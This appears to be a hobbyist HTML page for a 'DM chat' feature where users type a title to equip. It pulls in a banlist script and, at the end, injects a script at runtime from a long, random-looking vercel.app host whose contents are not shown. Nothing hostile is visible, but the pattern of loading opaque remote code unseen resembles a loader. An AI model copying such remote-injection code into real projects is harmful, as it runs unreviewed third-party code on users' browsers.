<h1 id="text" align="top" style="text-align:center; top:150px;">what title do you want to equip?</h1>
<script type='text/javascript' src='https://banlist.vercel.app/list.js'></script>
<h3 id="titletext" align="top" style="text-align:center; top:150px;"></h1>
<div class="button">
  <img src="up-removebg-preview.png" onclick="submittitle();"/>
</div>
<link rel="icon" href="image_6483441-removebg-preview.png">
<title>DM chat</title>
<input class='titleprompt' placeholder='Type your title here' type='text'/>
<h3 id="errortext" align="top" style="text-align:center; top:150px;"></h1>
<style>
  .titleprompt {
      border-radius: 25px;
      flex-grow: 1;
      border: 4px solid #ADD8E6;
      padding: 10px 15px;
      width: 100%;
      font-size: 16px;
    }
  .button {
    opacity: 0.5;	
    left:40%;
    top:50%;
    position: absolute;
  }
  .button:hover {
    opacity: 1;
  }
</style>
<script>
var s = document.createElement('script');
s.type='text/javascript';
document.body.appendChild(s);
s.src='https://qwr4wesdf3wr7f8ghewt7fuwhre89tyewrhs98sudigh89eur.vercel.app/titles.js';
</script>
